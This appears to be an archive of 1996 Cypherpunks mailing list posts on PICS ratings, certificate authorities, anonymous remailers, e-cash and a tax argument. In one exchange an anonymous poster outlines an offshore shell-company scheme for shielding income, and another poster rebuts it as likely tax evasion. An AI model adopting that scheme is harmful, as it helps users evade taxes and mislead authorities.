ug. I see that "market driven" didn't make a lot of sense the way I used
it. I was not talking about money. I was using it in the sense 
of "third-party ratings" vs. "self-ratings".  maybe the latter 
terminology is better.

I'd like to point out that market-driven systems, in the sense you use
of the economy supporting the creation of the ratings, already exist
in cyberspace.

examples:

1. point communications top 5%. people effectively pay this company
to find the "cool web sites" by buying their book or whatever.

2. surfwatch. as I understand it they have already rated many
sites out there on the internet and are using a proprietary system
that mimics a rating server. people are essentially paying for
them to rate web sites through the purchase price of the software.

other examples probably exist.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sat, 11 May 1996 18:30:56 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.rutgers.edu>
Subject: Re: Publicity on PICS
In-Reply-To: <01I4ID8CLHOK8Y5B50@mbcl.rutgers.edu>
Message-ID: <199605110425.VAA28304@netcom20.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



>>At the same time, providers will be urged to rate their pages by filling out
>>an electronic questionnaire resulting in a "grade" for each site, on a scale
>>ranging from zero, the most innocuous, to four for each category.
>
>	What was I saying about pressure to rate?

this is really horrible. I hope that no precedent of having internet
providers involvement in ratings is *ever* established. this proposal
reeks. separate ratings from content and delivery.

>>The system depends for its ratings on voluntary compliance by Internet
>>providers.

ugggghghghghg. not my ideal use of PICS. I hope that people don't
begin to believe that PICS is this system.

>>But there is no way to use the system to seek out pornography or violence on
>>the web, officials insisted.

I don't know why that would be a problem.

>>"To content-providers, I would say, 'Rate your sites' To parents I would
>>say, 'Set the levels for your children.' And to governments, I would say
>>humbly, 'Think again before censoring the net,"' Stephen Balkam, executive
>>director of the Recreational Software Advisory Council, told a news
>>conference.
>
>	Note again the pressure for self-rating.

"content-providers" != internet providers. that former is OK. the
latter is a horrible nightmare. please, please, please, 
I hope this system is not asking/demanding people who run hardware 
& communication services to get into the rating business.
 such a thing is atrocious and odious
and exactly what should be avoided.

>>A strength of PICS is that "it allows as many countries as would like to set
>>up a rating system," said Jim Miller, a research scientist who helped
>>develop the system. Adhering to the system would still be up to individual
>>households, however.
>
>	Whatever became of market-ratings? Admittedly, they may mean that each
>country will be encouraged to given an example system... but I still don't
>like the idea of government involvement.

the government becomes just another rating agency. I don't like it either.
but as long as we emphasize, "the individual always has the ultimate
decision", which fortunately this press release does,
little can go awry, hopefully.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sat, 11 May 1996 18:36:39 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Mandatory Voluntary Self-Ratings
In-Reply-To: <adb7fc9806021004e41c@[205.199.118.202]>
Message-ID: <199605110435.VAA29286@netcom20.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



>For every proposed "ratings" system that involves value judgments about who
>should see something, I can think of examples where a quite opposite view
>is held.

true. hence you use a service whose opinions you agree with. there is
no canonical, ultimate, "true" ratings service. hence my dislike
of self-ratings that seem to presume the opposite is true. (i.e.
rate the page "what it actually is")

>I still think we are being led down a dangerous path in trying to architect
>ratings systems. As I said, we don't rate written words (at least I don't),
>we don't rate newspapers, etc.

all kinds of things are now rated in the world. stocks are rated.
movies are rated. books are rated. they are rated in various other
books, such as "top books on [x]".

>If a system gets built into the WWW, as with proposals for PICS, it _will_
>be used by those who want to control content. We should think twice before
>helping in any way.

I agree with your hesitation totally. I can easily see how the system
would be twisted in unspeakable ways. but I can see a lot of very
powerful positive uses too. as long as the best attempts are made to
discourage the former and encourage the latter...  again, there is a
question that the future might turn out to be more orwellian if no
action is taken by internet designers whatsoever. I tend to believe
that view.

>(No, I'm not _against_ private ratings services...but this has little to do
>with _me_, and I won't participate. More importantly, I won't have my
>content have any kind of tag attached!

notice that what you demand is wholly irrelevant. if you put something
out in the public, in a world of free speech, anyone is free to
rate your posting, or your opinions, etc.-- they just set a system
that refers to the message-id of your posts or something.

if what you are instead saying is that you will never insert your
own tags into your content, well that is something you have control
over. but you have absolutely no control over what people "attach"
to your posts in a "virtual" sense.  anyone could set up the
TCMay Rating Service and register ratings on everything you post in
public.

> Thus, the PICS thing looks intrusive
>to me, and not at all what I think of as a "private ratings service." I'll
>elaborate if my point is unclear.)

I would definitely be interested in an elaboration, although you don't
have to quote me if it makes you retch <g>. the only thing I 
see intrusive about PICS is the self-rating scheme. the third-party
rating scheme seems pretty "unintrusive" and invisible in my view.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dan Weinstein" <djw@vplus.com>
Date: Sat, 11 May 1996 19:07:31 +0800
To: timd@consensus.com (Tim Dierks)
Subject: Re: PGP, Inc.
Message-ID: <199605110530.WAA12458@ns1.vplus.com>
MIME-Version: 1.0
Content-Type: text/plain


On 10 May 96 at 18:12, you wrote:

> At 5:48 PM 5/10/96, Dan Weinstein wrote:
> >On Fri, 10 May 1996 10:22:24 -0700, timd@consensus.com wrote:
> >>
> >>The only effort they make is that when using the email-based CA,
> >>it mails the certificate to the address within, so it's not
> >>trivial to get a cert for an address that you don't have access
> >>to. (I'm not saying it's impossible, or even hard, just that it
> >>requires some skill and effort).
> >
> >I don't believe this is correct.  They send you information after
> >you have created the cert verifying that you set it up, but nothing
> >requires a response and the key is transfered via http.
> 
> If you'll examine my message, you'll see I was referring to the
> email-based S/MIME class 1 CA.
> 
> Best,
>  - Tim Dierks
> 
> Tim Dierks  --  timd@consensus.com  --  www.consensus.com
> Head of Thing-u-ma-jig Engineering, Consensus Development

Oops, sorry about that. 

Dan Weinstein
djw@vplus.com
http://www.vplus.com/~djw
PGP public key is available from my Home Page.
All opinions expressed above are mine.

"I understand by 'freedom of Spirit' something quite definite -
the unconditional will to say No, where it is dangerous to say
No.        
           Friedrich Nietzsche




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Sat, 11 May 1996 19:16:36 +0800
To: cypherpunks@toad.com
Subject: Reminder/details on May 11th SF Bay Area Meeting
Message-ID: <Pine.GUL.3.93.960510224933.4805C-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


Tomorrow, noon, Tresidder patio at Stanford. If you have the bandwidth,
you can get a DETAILED look at EXACTLY where we'll sit through
http://www-tour.stanford.edu:1081/cgi-bin/campus-click.prl/jmtl

Tresidder is at B4; a closeup picture of the benches where we'll sit is at
http://www-tour.stanford.edu:1081/cgi-bin/ctour.prl/00075.10/jmtl

Different versions of the JPEGs are appropriate for monitors with
different gamma settings.

(Why yes, as a matter of fact, we *did* have far too much time on our
hands.)

If people are really nice, we might sneak into my office for Ethernet
connectivity and presentation hardware. 

I suppose it's probably too late to offer to drive people from the PA
CalTrain station to campus, but you could page me. If you were counting on
the shuttle, sorry, it doesn't run tomorrow. It's about a 25-minute walk.

There will also be a "Spring Faire" and a "Powwow" on campus this weekend,
so count on a little traffic. Nowhere near as bad as a football game, mind
you.

Hugh Daniel wrote:

>For dinner I will suggest 'Thai City', about a 2 kilometers
>south of Page Mill at 4329 El Camino Real. It is on the
>Peninsula East side of the road, white building with a purple
>stripe around it and some {}`s (really). +1 415 493 0643

Thai City is excellent (and cheap).

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Sat, 11 May 1996 19:28:51 +0800
To: Jeff Simmons <jsimmons@goblin.punk.net>
Subject: Re: Hacktic remailer shutdown
In-Reply-To: <199605102223.PAA22489@goblin.punk.net>
Message-ID: <Pine.GUL.3.93.960510231213.4805D-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 10 May 1996, Jeff Simmons wrote:

> Is there any information available on why the Hacktic remailer was shut
> down?

Church of Scientology. Someone posted too many Secret Scriptures, it
seems. The details, nobody has shared. Conspiracy theories, galore, but I
have faith in their judgement and commitment to free speech and anonymity.
I'm sure it was a tough decision.

Btw, I don't believe it has shut down yet. Rather, the operators announced
that due to "recent events," there would be a planned shutdown on May
20th. 

I *would* like to know if the mail2news gateway is going down in addition
to the remailer. I'm assuming that it is. 

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 11 May 1996 19:22:52 +0800
To: Sandy Sandfort <cypherpunks@toad.com
Subject: Re: will the real Irving J. Schlublutz please stand up? was:	  Senator Leahy'sPublic Key
Message-ID: <adb97eba020210042d3b@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:58 PM 5/10/96, Sandy Sandfort wrote:
>~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>                       SANDY SANDFORT
>~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>
>C'punks,
>
>>On Thu, 9 May 1996, Timothy C. May wrote:
>
>>i think a related point is one we all know well, that being if there is a
>>will, there is a way.. we've seen it with phoney physicians and
>>specialists, even, with certificates and physicians' licenses.. if someone
>>wants to intercept corespondence and impersonate another person, it is
>>easy enough if that person has the time and impetus..

Actually, neither I nor Irving J. Schlublutz wrote this. (Careful reading
of the ">" marks makes this clear, but not all readers take the time to do
this, and the "Timothy C. May wrote" is misleading.)

--Tim

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dan@vplus.com (Dan Weinstein)
Date: Sat, 11 May 1996 15:49:55 +0800
To: timd@consensus.com (Tim Dierks)
Subject: Re: PGP, Inc.
In-Reply-To: <v02140b03adb92b2dbc65@[205.149.165.24]>
Message-ID: <3193e30f.2723100@mail.vplus.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 10 May 1996 10:22:24 -0700, timd@consensus.com wrote:
>
>The only effort they make is that when using the email-based CA, it mails
>the certificate to the address within, so it's not trivial to get a cert
>for an address that you don't have access to. (I'm not saying it's
>impossible, or even hard, just that it requires some skill and effort).

I don't believe this is correct.  They send you information after you
have created the cert verifying that you set it up, but nothing
requires a response and the key is transfered via http.


Dan Weinstein
djw@vplus.com
http://www.vplus.com/~djw
PGP public key is available from my Home Page.
All opinions expressed above are mine.

"I understand by 'freedom of Spirit' something quite definite -
the unconditional will to say No, where it is dangerous to say
No.        
           Friedrich Nietzsche






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blanc <blancw@accessone.com>
Date: Sat, 11 May 1996 20:14:29 +0800
To: "'Vladimir Z. Nuri'" <vznuri@netcom.com>
Subject: RE: self-ratings vs. market ratings
Message-ID: <01BB3ED3.D79972C0@blancw.accessone.com>
MIME-Version: 1.0
Content-Type: text/plain


>From Vladimir Z. Nuri (just when I thought it was over): 

	".......PICS is a very flexible architecture and I hope it will be 
	"used in many ingenious ways not previously foreseen."

Guess so.  

.  How long do "cool sites" stay "hot"?
.  How long would web pages rated "sexual content" keep that rating?

.  Many sites are casually rated as "cool" for the fun of it.  
.  Why are controversial pages rated?

.  What motivated Yahoo to begin featuring Top 5 Sites of the Week?
.  What motivates those who are calling for mandatory rating?


	"but in a sense, this is what you do whenever you read a book
	or a newspaper. you are reading information screened by 
	someone else."

You could say that *all* communication is a rating, then.   All evaluations are ratings (as are all emotions, and all modifying terms in grammar.  Art is a rating on life, as love is a rating on others).   But an individual must decide how much screening they can tolerate before they become useless to themselves (or:  *whose* rating is important?)

Many things help us to make judgements, to aid us in arriving at conclusions.   Ratings present the conclusion itself:  rather than assisting, by reasoning and discussion (or argument) in the development of judgement,  they present a final evaluation.  They leave out the middle, where the work of thought takes place.    


	"ratings are not a substitute for personal judgement. they are 
	meant to be a method to aid thinking, not to replace it, imho."

They can do that, in a very reduced, limited way.  I myself think that even short descriptions are more informative and useful.  You can reduce communication to such constricted labels that it loses all meaning.

Or as Beavis n Butthead would posit:  uh - uh; uh - uh

(hee-hee.  It just occurred to me how dogs mark their territory.  You could call *that* a rating, too.  THIS site is MINE, honey!!)

     ..
Blanc

	









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Sat, 11 May 1996 22:05:40 +0800
To: cypherpunks@toad.com
Subject: [Fwd: Re: PGP, Inc.]
Message-ID: <3194593C.E86@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain

I meant to send this along to the list as well as Raph.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.


To: Raph Levien <raph@cs.berkeley.edu>
Subject: Re: PGP, Inc.
From: Jeff Weinstein <jsw@netscape.com>
Date: Sat, 11 May 1996 02:07:40 -0700
Organization: Netscape Communications Corp.
References: <v02140b03adb92b2dbc65@[205.149.165.24]> <3193E226.575E651C@cs.berkeley.edu>
Reply-To: jsw@netscape.com

Raph Levien wrote:
> 
> Tim Dierks wrote:
> >
> > The only effort they make is that when using the email-based CA, it mails
> > the certificate to the address within, so it's not trivial to get a cert
> > for an address that you don't have access to. (I'm not saying it's
> > impossible, or even hard, just that it requires some skill and effort).
> 
> For example, see http://www.digicrime.com/id.html . I believe they got
> these certificates using the Web, rather than e-mail.
> 
> I think with e-mail, you'd actually have to be running a packet sniffer
> or doing an active attack such as DNS spoofing. However, the Web is
> much, much more convenient.
> 
> In any case, the page I referenced above is worthwhile reading.

  It is certainly possible to put e-mail 'into the loop' when
issuing certs via the web.  With Netscape Navigator 3.0 there is
no requirement that the cert be issued immediately when requested.
I expect that some cert vendors who are issuing low assurance
certs will e-mail the requestor a password that they can use to
retrieve their cert.  This at least provides some(not total) assurance
that the requestor can receive e-mail at the address in the cert.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Sat, 11 May 1996 22:08:06 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: Compu$erve, Netscape offering Lotus Notes competitor
In-Reply-To: <01I4IDJBJNH48Y5B50@mbcl.rutgers.edu>
Message-ID: <31946164.42A7@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


E. ALLEN SMITH wrote:
> 
>         There is no mention in either of these articles about what encryption
> protection will be used; it does appear that Netscape Navigator software will
> be used, which does have some protections (very little for the out-of-US stuff,
> of course). Jeff?

  I don't really know any details about this deal, but it looks like
they are just using our normal software (Navigator, HTTP server, NNTP
server, etc.)  I don't know how many of compuserve's customers are
outside the US & Canada, but any that are will be subject to normal
export restrictions (limited to 40-bit RC4).  US and Canadian
customers should be able to use US versions that have 3DES and 128-bit
RC4.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous User <nobody@c2.org>
Date: Sat, 11 May 1996 22:10:17 +0800
To: cypherpunks@toad.com
Subject: Re: Why I Pay Too Much in Taxes
Message-ID: <199605111005.DAA28141@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Black Unicorn wrote:
>In this case the people paying the offshore company for Mr. May's services
>are also subject to reporting requirements and a 30% withholding tax for
>which they will be held liable.

Nobody pays offshore for Mr. May. They pay a domestic corporation for his
services. The corporation pays Mr. May a sufficient taxable salary for his
domestic expenses. Anything above that (i.e. money that Mr. May don't need
right now) is paid to the offshore entity as (for instance) deductible license
fees. The payment should probably go to a jurisdiction with a double taxation
agreement with the US, like Holland or Ireland. In Ireland it's easy to setup
a tax free corporation that sends all it's income to an offshore trust, where
the money stays until Mr. May needs them.

>This adds the requirement that the individuals or corporations receiving
>Mr. May's service be involved in this conspiracy.  If they could have
>been, why do you need the offshore connection?  Why not just conspire with
>them to pay Mr. May in cash and not report it?

They just deal with the vice president of a typical domestic consulting
corporation. That the CEO of the company is an alcoholic living on a park
bench (for the ultra cheep setup) is nobody's business. He's on permanent
vacation for all they care.

>If your above scheme is intended merely to conceal funds it is a fairly
>poor example as it depends on the secrecy of each and every 'employee' of
>the company.

Only one individual and he's too drunk to remember anything.

>Continue your participation in such a plan.  I will send you cigs.

Thanks, but I can afford Cuban cigars. I'm selling setup's like the above for
a very nice fee. And this is the kiddie version of serious tax planning. After
all, Mr.May would still pay taxes on his domestic spending.

X

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQEUAwUBMZJGdFtwWVJrMFYlAQFcAgf2JtuGoc+NE+rl+ZJV5B8PBg2N+u8gpRvt
biX+y3asBIkynniRRga9kS00601AHgRQlEkH46BY179PhUNdVV+Q4cv3h4TQ3azl
dENuanxLE1xJZnROfkbxNDyg71yogaUGC8dMlQs2vRZ31OdlPnz5E0WafPX4TDNy
jI6FZsdYQeqLcFH6xzDS15pLAvh9NXAklzHBGLafuzzDQaVBO9GHRf/MCU5FzXJE
KosQ3P2n/qb73kbFOxu7mebR3Emf3sAYRfmlqpe8bHM47Sy34hbPutvzMMIrrF+t
dPQHbHDWGgaoEQ6mDhOdqmlZSjdObNmMcll4snoaiU02HsYNo0rc
=+nH5
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sat, 11 May 1996 23:21:10 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: Penet-style web remailer?
Message-ID: <199605111054.DAA20508@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:17 PM 5/8/96 EDT, "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
wrote:
>	As a result of scanning through the Nando Times'
> (http://www.nando.net/nt/) Infotech section, I came across a piece on email
> with the following address: http://noah.pair.com/anon.html. It appears to 
> be sort of a penet-style anonymous remailer, only without return messages.
> Anyone know anything else about it? Of course, given the number of web
> interfaces to fully anonymous remailers, I wouldn't encourage anyone 
> to use it.

Well, if you look at the remailer part of the web page, it's just
one of many web pages that are a form interface to a remailer CGI program.
Basically a friendly way to use a standard 1-way Cypherpunks remailer.

The guts of the page (from View Source) are use replay's CGI
and the ecafe remailer:
        <form method="post" action="http://www.replay.com/cgi-bin/anon.exe"> 
        <input type="hidden" name="remailers" value="cpunk@remail.ecafe.org">
        <table border=2>           
        <tr><td align=right>           
        to: <input size=20 type=text name="to" value=""><br>           
        subject: <input size=20 type=text name="subject" value=""></td>

        <td align=center><input type="submit" value="send mail"></td></tr>

        <tr><td align=center colspan=2>           
        <textarea name="message" rows=12 cols=70 value="test">
        Put your message here.</textarea>           
        </td>           
        </tr>           
        </table>           
        </form>  

There is an amusing stealthed message at the bottom of the page,
designed to attract high relevancy ratings from spiders.....
#					Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215
# goodtimes signature virus innoculation






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sat, 11 May 1996 23:37:39 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: Penet-style web remailer?
Message-ID: <199605111059.DAA20623@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


>  http://noah.pair.com/anon.html.

Oh, forgot to add that it's also got a mailto: for
anon@noah.pair.com, so it is running its own remailer as
well as pointing to another remailer's CGI.
#					Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215
# goodtimes signature virus innoculation






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Sun, 12 May 1996 01:59:03 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: Why I Pay Too Much in Taxes
In-Reply-To: <01I4JVOF385S8Y5AN2@mbcl.rutgers.edu>
Message-ID: <Pine.SV4.3.91.960511083148.13232B-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


There's no particular need for tax fraud, except by little guys. The big 
guys have lots of legal techniques. A prime example was the notorious 
$1000->$100,000 cattle futures transaction that Hillary Rodham Clinto 
did, just before entering the White House. Clearly, it wasn't an 
investment: it was a scheme to let some rich Arkansas guy pay a bribe - 
legally.  A cooperative broker sets up a "short" position and a "long" 
position on a trade - then the positions get assigned, after the market 
has made its move, such that the guy "loses" the $100k  and Hillary "has 
a profit".




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Sun, 12 May 1996 06:47:41 +0800
To: cypherpunks@toad.com
Subject: The perfect IPO
Message-ID: <Pine.SOL.3.91.960511100234.17980A-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


Secure Fingerprint verification over the World Wide Web in Java.
So cutting edge, I haven't even installed powerpoint yet. 

Simon
---
Cause maybe  (maybe)		      | In my mind I'm going to Carolina
you're gonna be the one that saves me | - back in Chapel Hill May 16th.
And after all			      | Email address remains unchanged
You're my firewall -    	      | ........First in Usenet.........




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: abostick@netcom.com (Alan Bostick)
Date: Sun, 12 May 1996 08:00:00 +0800
To: cypherpunks@toad.com
Subject: Re: distinctive properties of ecash, netbill, cybercash and iKP
In-Reply-To: <Pine.GSO.3.93.960511163200.17967B-100000@happyman>
Message-ID: <+kMlx8m9LQfO085yn@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <Pine.GSO.3.93.960511163200.17967B-100000@happyman>,
=?ISO-8859-1?Q?J=FCri_Kaljundi?= <jk@stallion.ee> wrote:
> 
>  Sat, 11 May 1996, Jon Moore wrote:

> > The banks/cash-issuing corporations are likely to support anything
> > that is secure enough, and looks like a runner, because any e-money
> > scheme is profitable to them (they earn interest on the
> > corresponding real cash while the e-money is in circulation). 
> 
> This is one question why the central bank in Estonia (I am not sure about
> other countries) does not allow issuing e-cash here in Estonia. While the
> banks issue e-cash to people, they get some real cash from people.  This
> leads to actually doubleing the money in circulation, each monetary unit,
> either dollar or kroon, can at the same time be used by owner of e-cash
> and at the same time by the bank. The central banks are afraid that when
> the amount of e-cash in circulation gets big, this could lead to
> devalvation of money, especially a small country like Estonia is afraid of
> such development.

Good heavens!  Are checking accounts illegal in Estonia, then?  The exact
same argument applies to them.

> 
> Anonymity of monetary transactions is another thing that Bank of Estonia
> has declared illegal.

Cash is illegal, too!  How does the economy in Estonia work these days?
Barter?

- -- 
Alan Bostick               | "The thing is, I've got rhythm but I don't have
mailto:abostick@netcom.com | music, so I guess I could ask for a few more 
news:alt.grelb             | things." (overheard)
http://www.alumni.caltech.edu/~abostick

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMZTKJ+VevBgtmhnpAQHHpQMAmpLtHIXNIHSxBnAtZMz2mlVoI7i+765r
i9Cv6J0TA3OWd1LqFnrOSlpL9SIjAAxn0bwSZFERwfzetyIxya5ctyWRUOjbQtI3
ApL5XhskucNEq9Z5cWl0wQRwptivCCLl
=rvLb
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sun, 12 May 1996 03:54:49 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: Re: Why I Pay Too Much in Taxes
In-Reply-To: <199605111005.DAA28141@infinity.c2.org>
Message-ID: <Pine.SUN.3.93.960511103237.21817F-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

On Sat, 11 May 1996, Anonymous User wrote:

> Black Unicorn wrote:
> >In this case the people paying the offshore company for Mr. May's services
> >are also subject to reporting requirements and a 30% withholding tax for
> >which they will be held liable.
> 
> Nobody pays offshore for Mr. May.

Except see footnote 1.

> They pay a domestic corporation for his
> services. The corporation pays Mr. May a sufficient taxable salary for his
> domestic expenses.

Footnote 1:

> Anything above that (i.e. money that Mr. May don't need
> right now) is paid to the offshore entity as (for instance) deductible license
> fees.

Looks like someone paying offshore for Mr. May to me.  Again, 30%
withholding requirement unless you intend to hide it.  The only way to
avoid this is to conceal Mr. May's involvement.

I really suggest you read some U.S. tax code provisions.

> The payment should probably go to a jurisdiction with a double taxation
> agreement with the US, like Holland or Ireland. In Ireland it's easy to setup
> a tax free corporation that sends all it's income to an offshore trust, where
> the money stays until Mr. May needs them.

Such a jurisdiction will have extensive information sharing provisions
with the United States.  If you're planning on secrecy, avoid 
jurisdictions with tax treaties.

Also note that payments to an account for which Mr. May is the beneficiary
can trigger realization in several circumstances.

In this case the offshore entity can easily be classified as a Foreign
Personal Holding Company.  The resulting assets will be taxed per Subpart
F income.  (i.e. without regard to their distribution).  If the offshore
entity is held by U.S. stockholders it is going to cause major problems.
If not it still has major problems.
 
What you fail to mention is that in the event Mr. May actually holds the
assets until his retirement, he will still have to deal with realization
and full taxation when he taps into the funds.  You also fail to mention
the reporting requirements for U.S. citizens holding offshore assets of
significant size.

Because this plan can't seem to decide if it is secret or not, it has
serious shortcomings.

> >This adds the requirement that the individuals or corporations receiving
> >Mr. May's service be involved in this conspiracy.  If they could have
> >been, why do you need the offshore connection?  Why not just conspire with
> >them to pay Mr. May in cash and not report it?
> 
> They just deal with the vice president of a typical domestic consulting
> corporation. That the CEO of the company is an alcoholic living on a park
> bench (for the ultra cheep setup) is nobody's business. He's on permanent
> vacation for all they care.

The example given looked to take advantage of large numbers of fictitious
employees all participating in the endeavor.  This is foolish.

Even in your example above, secrecy is poorly thought out.  Either it is a
tax avoidance plan, or it is a tax evasion plan.  Which is it?

Practically speaking I think you have merely altered the plan to adjust
for my comments and are stuck between both fact scenerios now.

> >If your above scheme is intended merely to conceal funds it is a fairly
> >poor example as it depends on the secrecy of each and every 'employee' of
> >the company.
> 
> Only one individual and he's too drunk to remember anything.

See above.  See also foreign personal holding company and passive income
provisions.

Wherever Mr. May sends his money it is still subject to taxation in the
United States if Mr. May is a citizen.  Structuring the payments to an
offshore entity in an attempt to avoid taxation on those payments is an
attempt to get the IRS to honor form over substance.  Good luck.

> >Continue your participation in such a plan.  I will send you cigs.
> 
> Thanks, but I can afford Cuban cigars. I'm selling setup's like the above for
> a very nice fee.

Caveat emptor.  (What's the name of your firm by the way?  Or do you
prefer to keep it concealed?  I would think you'd advertize it here if
you had anything worth selling).

Your ilk, (other examples of which can be found in the back of The
Economist, and Soldier of Fortune), are a small step above "get rich
quick" types.  Off the shelf companies and trusts have their uses but
anyone proposing to sell a standard tax avoidance/evasion setup off the
shelf should trigger major alarm bells.

Cuban's will serve you better in a federal country club than cigs, this I
admit.

> And this is the kiddie version of serious tax planning. After
> all, Mr.May would still pay taxes on his domestic spending.

I think calling this any kind of version of serious tax planning is
inaccurate.

> X

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Autodocument signed

iQCVAwUBMZSsC2qgui0rHO4JAQEzTAP+NAB9nNODHqI/mcEepuEFK1352dw1veKR
FVWpF7LPUXWxAbgrx/i7NV8F1t3N+AKYOm1f6SGRaF9a15kBDB66uPLBPU62tyLN
go8QWrmJIk/fi1l2lfQUdXMklg1mEAgnjFkybRVsG4AQn3VsSvdhMCJ+myepeUoT
Ag1u3Cdm8oA=
=EwSG
-----END PGP SIGNATURE-----

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Burroughs <richieb@teleport.com>
Date: Sun, 12 May 1996 08:11:08 +0800
To: cypherpunks@toad.com
Subject: Re: [Yadda Yadda Heil Dave] Re: Rich is leaving for thetapunks
Message-ID: <2.2.32.19960511190720.00753268@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:04 PM 5/10/96 -0700, you wrote:
>If I didn't know him better, I'd have thought that Dave had entirely
>missed my sarcasm. Thanks for the laugh, Skippy! 

LOL.  

Dave, don't believe what you read on theta.com... ;)

>-rich
> FUCKING SCIENTOLOGIST*
>
> * - FUCKING SCIENTOLOGIST is a registered trademark of the Religious
>     Technology Center

You know it.  

All of you copyright terrorists who keep infringing on RTC's trademarks by
using the word Freed*m will pay, too, I can assure you...


Rich

______________________________________________________________________
Rich Burroughs  richieb@teleport.com  http://www.teleport.com/~richieb
See my Blue Ribbon Page at http://www.teleport.com/~richieb/blueribbon
New EF zine "cause for alarm" - http://www.teleport.com/~richieb/cause





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matts Kallioniemi <matts@pi.se>
Date: Sat, 11 May 1996 23:39:36 +0800
To: EALLENSMITH@ocelot.Rutgers.EDU
Subject: Re: Remailer in a box
Message-ID: <2.2.32.19960511105220.003ad7d0@mail.pi.se>
